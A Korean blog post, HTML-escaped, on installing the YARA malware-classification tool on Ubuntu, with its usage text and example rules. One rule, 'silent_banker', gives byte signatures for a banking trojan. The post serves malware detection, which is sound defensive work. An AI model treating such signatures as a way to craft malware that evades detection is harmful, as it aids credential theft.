&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif; font-size: 13px; line-height: 16px; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; &quot;&gt;YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ubuntu 9.10 버전(kernel 2.6.31-14)에 설치했습니다.&lt;br /&gt;
&lt;br /&gt;
우분투 기본으로 설치했더니 소스코드 설치시 에러가 나더군요..&lt;br /&gt;
&lt;br /&gt;
libpcre3-dev와 g++이 필요합니다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
공식사이트에 있는 매뉴얼도 첨부합니다.&lt;br /&gt;
&lt;br /&gt;
&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile25.uf@1836B8394DC7502C0616BF.pdf&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/pdf.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; YARA User's Manual 1.5.pdf&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;root@ubuntu:~# yara&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;usage: &amp;nbsp;yara [OPTION]... [RULEFILE]... FILE | PID&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;options:&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -t &amp;lt;tag&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print rules tagged as &amp;lt;tag&amp;gt; and ignore the rest. Can be used more than once.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -i &amp;lt;identifier&amp;gt; &amp;nbsp; &amp;nbsp;print rules named &amp;lt;identifier&amp;gt; and ignore the rest. Can be used more than once.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -n &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print only not satisfied rules (negate).&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -g &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print tags.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -m &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print metadata.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -s &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print matching strings.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -l &amp;lt;number&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;abort scanning after a &amp;lt;number&amp;gt; of rules matched.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -d &amp;lt;identifier&amp;gt;=&amp;lt;value&amp;gt; &amp;nbsp; define external variable.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -r &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; recursively search directories.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -f &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; fast matching mode.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; -v &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; show version information.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;Report bugs to: &amp;lt;victor.alvarez@virustotal.com&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif; font-size: 13px; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: normal; &quot;&gt;&lt;pre class=&quot;prettyprint&quot; style=&quot;font-size: 12px; padding-top: 0.5em; padding-right: 0.5em; padding-bottom: 0.5em; padding-left: 0.5em; overflow-x: auto; overflow-y: auto; font-family: Monaco, 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Lucida Console', monospace; max-width: 70em; background-color: rgb(238, 238, 238); &quot;&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;rule silent_banker &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; banker&lt;/span&gt;
&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;{&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; meta&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; description &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;str&quot; style=&quot;color: rgb(0, 136, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&quot;This is just an example&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; thread_level &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; in_the_wild &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;kwd&quot; style=&quot;color: rgb(0, 0, 136); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;true&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; strings&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $a &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;{&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;6A&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;40&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;68&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;00&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;30&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;00&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;00&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;6A&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;14&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;8D&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;91&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &amp;nbsp;&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $b &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;{&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;8D&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;4D&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; B0 &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;2B&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; C1 &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;83&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; C0 &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;27&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;99&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;6A&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;4E&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;lit&quot; style=&quot;color: rgb(0, 102, 102); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;59&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; F7 F9&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $c &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;str&quot; style=&quot;color: rgb(0, 136, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&quot;UVODFRYSIHLNWPEJXQZAKCBGMT&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; condition&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;color: rgb(102, 102, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $a &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;kwd&quot; style=&quot;color: rgb(0, 0, 136); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;or&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; $b &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;kwd&quot; style=&quot;color: rgb(0, 0, 136); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;or&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;color: rgb(0, 0, 0); &quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt; $c&lt;/span&gt;
&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&lt;font class=&quot;Apple-style-span&quot; color=&quot;#666600&quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;}&lt;/span&gt;
&lt;/font&gt;&lt;font class=&quot;Apple-style-span&quot; color=&quot;#666600&quot;&gt;
&lt;/font&gt;&lt;font class=&quot;Apple-style-span&quot; color=&quot;#000000&quot;&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;rule PE&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;{&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;    condition:&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;        uint16(0) == 0x5A4D and&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;        uint32(uint32(0x3C)) == 0x00004550&lt;/span&gt;
&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;}&lt;/span&gt;
&lt;/font&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile5.uf.tistory.com/original/170AD34F4DC780F6063A5D&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile5.uf.tistory.com/image/170AD34F4DC780F6063A5D&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;yara_result.png&quot; height=&quot;178&quot; width=&quot;638&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;
&lt;br /&gt;
yara는 패턴을 얼마나 많이 가지고 있냐하는 문제가 있습니다.&lt;br /&gt;
&lt;br /&gt;
패턴이야 하나둘씩 만들려면 만들겠지만...&lt;br /&gt;
&lt;br /&gt;
쉽지는 않겠죠? ㅜ.ㅜ&lt;br /&gt;
&lt;br /&gt;
일단 매뉴얼 보고 공부 좀 해야겠습니다.&lt;br /&gt;
&lt;br /&gt;
여차하면 번역을...-_-;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;참고 : YARA - 파일 패턴 매칭&lt;br /&gt;
&lt;a href=&quot;http://secuworld.blogspot.com/2009/10/yara-%ED%8C%8C%EC%9D%BC-%ED%8C%A8%ED%84%B4-%EB%A7%A4%EC%B9%AD.html&quot;&gt;http://secuworld.blogspot.com/2009/10/yara-%ED%8C%8C%EC%9D%BC-%ED%8C%A8%ED%84%B4-%EB%A7%A4%EC%B9%AD.html&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-146-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-146-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-146-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
